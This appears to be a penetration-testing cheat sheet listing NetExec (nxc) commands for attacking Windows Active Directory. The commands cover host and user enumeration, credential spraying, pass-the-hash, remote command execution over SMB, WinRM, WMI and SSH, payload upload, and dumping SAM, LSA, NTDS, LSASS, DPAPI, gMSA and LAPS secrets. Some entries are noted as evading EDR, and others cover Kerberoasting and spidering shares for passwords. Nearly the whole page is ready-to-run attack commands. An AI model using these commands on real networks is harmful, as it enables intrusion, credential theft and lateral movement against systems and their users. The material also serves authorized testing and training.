active-directory

NetExec (CrackMapExec) — AD Lateral Movement

NetExec (nxc) — the Swiss Army knife for Windows/AD lateral movement, credential spraying, and post-exploitation.

Jul 2026 lazyhackers
SMB Enumeration & Auth (16)

nxc smb 192.168.1.0/24
    Discover SMB hosts on subnet
    tags: smb discovery

nxc smb 10.10.10.1 -u user -p password
    Test SMB credentials
    tags: smb auth

nxc smb 10.10.10.1 -u user -H NTLMhash
    SMB pass-the-hash
    tags: smb pth

nxc smb 192.168.1.0/24 -u user -p password
    Spray credentials across subnet
    tags: smb spray

nxc smb 10.10.10.1 -u users.txt -p passwords.txt --continue-on-success
    Credential spray with lists
    tags: smb spray

nxc smb 10.10.10.1 -u user -p password --shares
    Enumerate SMB shares
    tags: smb shares enum

nxc smb 10.10.10.1 -u user -p password --sessions
    List active SMB sessions
    tags: smb sessions

nxc smb 10.10.10.1 -u user -p password --users
    Enumerate domain users via SMB
    tags: smb users enum

nxc smb 10.10.10.1 -u user -p password --groups
    Enumerate domain groups
    tags: smb groups enum

nxc smb 10.10.10.1 -u user -p password --pass-pol
    Get password policy
    tags: smb policy

nxc smb 10.10.10.1 -u user -p password --rid-brute
    RID brute force to enumerate users/groups
    tags: smb rid enum

nxc smb 10.10.10.1 -u user -p password --loggedon-users
    List logged-on users (hunt where admins are sitting)
    tags: enum sessions

nxc smb 10.10.10.1 -u user -p password --local-auth
    Authenticate with a LOCAL account instead of domain
    tags: auth local

nxc smb 10.10.10.1 -u '' -p ''
    Null-session enumeration (no creds)
    tags: enum null

nxc smb 10.10.10.1 -u user -p password --computers
    List domain computer objects
    tags: enum computers

nxc smb 192.168.1.0/24 -u user -p password --gen-relay-list relay.txt
    Find hosts with SMB signing OFF (relay target list)
    tags: enum relay signing
Code Execution (7)

nxc smb 10.10.10.1 -u user -p password -x "whoami"
    Execute command via SMB
    tags: smb exec cmd

nxc smb 10.10.10.1 -u user -p password -X "Get-Process"
    Execute PowerShell command
    tags: smb exec powershell

nxc winrm 10.10.10.1 -u user -p password -x "whoami"
    Execute via WinRM (PS Remoting)
    tags: winrm exec

nxc wmi 10.10.10.1 -u user -p password -x "whoami"
    Execute via WMI
    tags: wmi exec

nxc smb 10.10.10.1 -u user -p password -x "whoami" --exec-method smbexec
    Choose the exec method (atexec / smbexec / wmiexec / mmcexec)
    tags: exec method

nxc smb 10.10.10.1 -u user -p password --put-file ./payload.exe 'C:\Windows\Temp\p.exe'
    Upload a file to the target
    tags: exec upload

nxc smb 10.10.10.1 -u user -p password --get-file 'C:\Users\Administrator\Desktop\flag.txt' ./flag.txt
    Download a file from the target
    tags: exec download
Credential Dumping (10)

nxc smb 10.10.10.1 -u user -p password --sam
    Dump SAM hashes (local admin needed)
    tags: sam dump creds

nxc smb 10.10.10.1 -u user -p password --lsa
    Dump LSA secrets
    tags: lsa dump creds

nxc smb 10.10.10.1 -u user -p password --ntds
    DCSync — dump NTDS.dit (DA needed)
    tags: ntds dcsync dump

nxc smb 10.10.10.1 -u user -p password -M mimikatz
    Run Mimikatz module
    tags: mimikatz creds

nxc smb 10.10.10.1 -u user -p password -M lsassy
    LSASS dump with lsassy module
    tags: lsassy lsass dump

nxc smb 10.10.10.1 -u user -p password --dpapi
    Dump & decrypt DPAPI secrets (saved creds, browser, vaults)
    tags: dpapi dump

nxc smb 10.10.10.1 -u user -p password --laps
    Read LAPS local-admin passwords (where authorized)
    tags: laps

nxc smb 10.10.10.1 -u admin -p password --ntds drsuapi
    DCSync-style NTDS dump over DRSUAPI
    tags: ntds dcsync

nxc smb 10.10.10.1 -u user -p password -M nanodump
    Dump LSASS via nanodump (more EDR-evasive)
    tags: module lsass nanodump

nxc smb 10.10.10.1 -u user -p password -M gpp_password
    Recover cPassword from SYSVOL GPP (MS14-025)
    tags: module gpp
LDAP & Other Protocols (14)

nxc ldap 10.10.10.1 -u user -p password --asreproast asrep.txt
    AS-REP Roasting via LDAP
    tags: ldap asrep kerberos

nxc ldap 10.10.10.1 -u user -p password --kerberoasting kerb.txt
    Kerberoasting via LDAP
    tags: ldap kerberoast kerberos

nxc ldap 10.10.10.1 -u user -p password --bloodhound -ns 10.10.10.1 -c All
    Collect BloodHound data via LDAP
    tags: ldap bloodhound

nxc ldap 10.10.10.1 -u user -p password --gmsa
    Dump gMSA passwords
    tags: ldap gmsa

nxc mssql 10.10.10.1 -u sa -p password -q "SELECT @@version"
    MSSQL query execution
    tags: mssql sql

nxc mssql 10.10.10.1 -u sa -p password --local-auth
    MSSQL with local auth
    tags: mssql local-auth

nxc ssh 10.10.10.1 -u user -p password -x "id"
    SSH command execution
    tags: ssh exec

nxc rdp 192.168.1.0/24 -u user -p password
    Test RDP credentials on subnet
    tags: rdp spray

nxc ldap 10.10.10.1 -u user -p password -M laps
    Read LAPS passwords over LDAP
    tags: ldap laps

nxc ldap 10.10.10.1 -u user -p password --trusted-for-delegation
    Find unconstrained-delegation accounts
    tags: ldap delegation

nxc ldap 10.10.10.1 -u user -p password --password-not-required
    Accounts with PASSWD_NOTREQD set
    tags: ldap enum

nxc ldap 10.10.10.1 -u user -p password -M adcs
    Enumerate AD CS certificate authorities
    tags: ldap adcs

nxc ldap 10.10.10.1 -u user -p password -M user-desc
    Dump user descriptions (often contain passwords)
    tags: ldap userdesc

nxc winrm 192.168.1.0/24 -u user -p password
    Sweep hosts for WinRM (evil-winrm) access
    tags: winrm sweep
Modules & Spidering (6)

nxc smb 10.10.10.1 -u user -p password -M spider_plus
    Spider every readable share and index files (JSON output)
    tags: module spider

nxc smb 10.10.10.1 -u user -p password --spider C$ --pattern password
    Spider a specific share for a keyword
    tags: spider loot

nxc smb 10.10.10.1 -u user -p password -M gpp_autologin
    Find autologon credentials in Group Policy
    tags: module gpp autologin

nxc smb 10.10.10.1 -u user -p password -M enum_av
    Enumerate installed AV / EDR products
    tags: module av edr

nxc ldap 10.10.10.1 -u user -p password -M maq
    Read the domain MachineAccountQuota
    tags: module maq

nxc smb -L
    List all available NetExec modules for a protocol
    tags: module list